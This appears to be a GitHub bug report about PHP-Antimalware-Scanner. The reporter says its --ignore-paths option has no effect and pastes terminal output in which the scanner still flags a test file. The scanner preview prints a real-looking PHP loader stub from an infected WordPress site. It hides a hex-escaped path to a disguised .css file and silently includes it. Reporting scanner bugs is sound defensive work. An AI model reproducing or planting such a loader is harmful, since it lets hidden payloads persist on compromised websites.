Ignore-path has no effect

[kepon85]

Hello

Version 0.14.0

It seems to me that the ignore(s)-path has no effect. Here's why I say that:

I would have thought that the files in "ignore path" were ignored but that doesn't seem to be the case. Of course I tried to put in unity, change the quotes, without wildard..

root@srvweb:~# mkdir /tmp/dirtest
root@srvweb:~# cp /opt/scripttest/test.php /tmp/dirtest/test.php
root@srvweb:~# php /opt/PHP-Antimalware-Scanner/scanner -l --ignore-paths="/tmp/dirtesttest.php,test.php,*test.php,/*test.php" /tmp/dirtest/

         █████╗ ███╗   ███╗██╗    ██╗███████╗ ██████╗ █████╗ ███╗   ██╗         
        ██╔══██╗████╗ ████║██║    ██║██╔════╝██╔════╝██╔══██╗████╗  ██║         
        ███████║██╔████╔██║██║ █╗ ██║███████╗██║     ███████║██╔██╗ ██║         
        ██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║     ██╔══██║██║╚██╗██║         
        ██║  ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║  ██║██║ ╚████║         
        ╚═╝  ╚═╝╚═╝     ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝         
                                                                                
        Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner        

                                 version 0.14.0                                 

                                                                                
                            PHP Antimalware Scanner                             
                           Created by Marco Cesarato                            
                                                                                

Agile mode enabled
Start scanning...
Scan date: 2024-11-14 16:21:00
Scanning /tmp/dirtest

Mapping and retrieving checksums, please wait...


Verifying files checksum...

[===============================] 100%  1/1 [0 sec/0 sec]

Found 1 files to check

Checking files...

[>                              ] 0%  0/1 [0 sec/0 sec]


PROBABLE MALWARE FOUND!
/tmp/dirtest/test.php

=================================== PREVIEW ====================================

  1 | <?php
  2 | /*92e78*/
  3 | 
  4 | $rdpnv0 = "/var/www/chute/web/wp\x2dincludes/blocks/post\x2daut\x68or\x2dbiograp\x68y/.5397785d.css"; if (!isset($rdpnv0)) {strrev ($rdpnv0);} else { @include_once /* 185 */ ($rdpnv0); }
  5 | 
  6 | /*92e78*/

================================================================================

Checksum: 675edd52709681efd3936bfec5887fc7
File path: /tmp/dirtest/test.php

Evil code found: 
[!] Exploit (infected_comment) [line 2]
    - Comments composed by 5 random chars usually used to detect if a file is infected yet
      => /*92e78*/

OPTIONS:

    [1] Delete file
    [2] Move to quarantine
    [3] Dry run evil code fixer
    [4] Dry run evil line code fixer
    [5] Open with vim
    [6] Open with nano
    [7] Add to whitelist
    [8] Show source
    [-] Ignore


amwscan > What is your choice?  

Thank's,
David